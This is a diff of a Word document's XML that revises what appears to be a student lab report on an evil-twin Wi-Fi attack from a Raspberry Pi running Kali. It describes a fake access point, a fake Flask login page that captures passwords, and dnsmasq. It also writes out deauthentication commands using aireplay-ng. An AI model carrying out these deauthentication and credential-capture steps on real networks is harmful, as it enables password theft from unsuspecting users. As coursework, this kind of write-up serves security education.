+          <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>task</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2 , the victim have alreadly connect to the fake AP, in this situation, as long as victim machine try to browsing the web, the fake login webpage will show in front of the victim and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>mis</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>guide them to enter the username and password, this confidential information will capture in the backend of the raspberry Pi</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -638,6 +891,7 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:color w:val="000000"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
@@ -688,7 +942,13 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:b/>
@@ -696,7 +956,34 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">Task1 </w:t>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho"/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Executive summary </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho" w:hint="eastAsia"/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> +</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -707,135 +994,87 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
+          <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
+          <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:t xml:space="preserve">Task1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">we downland the image of kali linux and using balenaEtcher to install the OS into the raspberry Pi, after </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>it</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>turn</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>on</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t xml:space="preserve">we open the </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t>term</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>inal and i</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t>n</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t xml:space="preserve">put </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t>`ifconfig` to check whether the internet card connect to the internet</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t xml:space="preserve"> before and after we connect to the internet.</w:t>
       </w:r>
     </w:p>
@@ -881,33 +1120,14 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+      </w:pPr>
+      <w:r>
         <w:t>The first step we done in this task is to create the fake AP, we have already plugin the ALFA adaptor</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t>,and following step will be:</w:t>
       </w:r>
     </w:p>
@@ -933,11 +1153,10 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61038563" wp14:editId="50650F08">
-            <wp:extent cx="5141631" cy="7765473"/>
-            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
+            <wp:extent cx="3946285" cy="5960125"/>
+            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
             <wp:docPr id="1" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -958,7 +1177,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5151382" cy="7780200"/>
+                      <a:ext cx="3957215" cy="5976633"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1001,43 +1220,20 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+      </w:pPr>
+      <w:r>
         <w:t>A</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t xml:space="preserve">fter the fake AP created, now we can deauth the victim </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t>by using aireplay-ng</w:t>
       </w:r>
     </w:p>
@@ -1114,18 +1310,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">We write the shell script to execute </w:t>
       </w:r>
     </w:p>
@@ -1134,18 +1320,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">As we have described functionality of command above, </w:t>
       </w:r>
     </w:p>
@@ -1154,26 +1330,11 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>the script for setup fake AP</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t xml:space="preserve"> will be </w:t>
       </w:r>
     </w:p>
@@ -1182,18 +1343,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>```</w:t>
       </w:r>
     </w:p>
@@ -1202,18 +1353,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>sh  twinstart.sh</w:t>
       </w:r>
     </w:p>
@@ -1310,11 +1451,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -1322,18 +1458,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>The script for deauthencating (force victim to disconnect to real AP)</w:t>
       </w:r>
     </w:p>
@@ -1342,11 +1468,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -1354,18 +1475,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>```</w:t>
       </w:r>
     </w:p>
@@ -1374,18 +1485,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>sh  deauth.sh victimMAC APMAC</w:t>
       </w:r>
     </w:p>
@@ -1502,13 +1603,26 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:b/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
         <w:t>Task3</w:t>
       </w:r>
     </w:p>
@@ -1517,18 +1631,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">We first install dnsmasq in the kali, and configure the conf file according below </w:t>
       </w:r>
     </w:p>
@@ -1629,18 +1733,8 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t>And execute the shell script to launch the dnsmsaq (dns server and dhcp server)</w:t>
       </w:r>
     </w:p>
@@ -1773,71 +1867,31 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
+      <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>A</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>nd</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t xml:space="preserve"> then we create the fake login page</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t xml:space="preserve"> and turn on the flask server </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t>on kali</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t>(we assume this is similar as the real page which victim using)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:noProof/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -1895,54 +1949,19 @@
       </w:pPr>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
+      <w:r>
         <w:t xml:space="preserve">when victim </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t xml:space="preserve">enter the password and </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t xml:space="preserve">click the submit </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t>the chrome will execute the js script sending the password to the flask server we build in the kali trough port 5000</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:t xml:space="preserve"> and api will automatic generate the file for password captured.</w:t>
       </w:r>
     </w:p>
@@ -2032,8 +2051,12 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
@@ -2041,364 +2064,4861 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t>Task4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Segment 4_1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>-A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>, Segment 4_1-B</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:widowControl w:val="0"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">We disable the fake AP by finding and killing the process of “airbase-ng” </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t>ps -ef | grep “twinstart.sh”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ill -9 &lt;processNumber&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:widowControl w:val="0"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">To make the victim device reconnect to the original AP, we also do a deauthentication attack to make the victim device </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>immediately</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> reconnect to the original one (Otherwise it will take times to be aware of that AP has been closed), such that:</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ireplay-ng --deauth 0 -c “$clientmac” -a “$apmac” “$name”mon</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
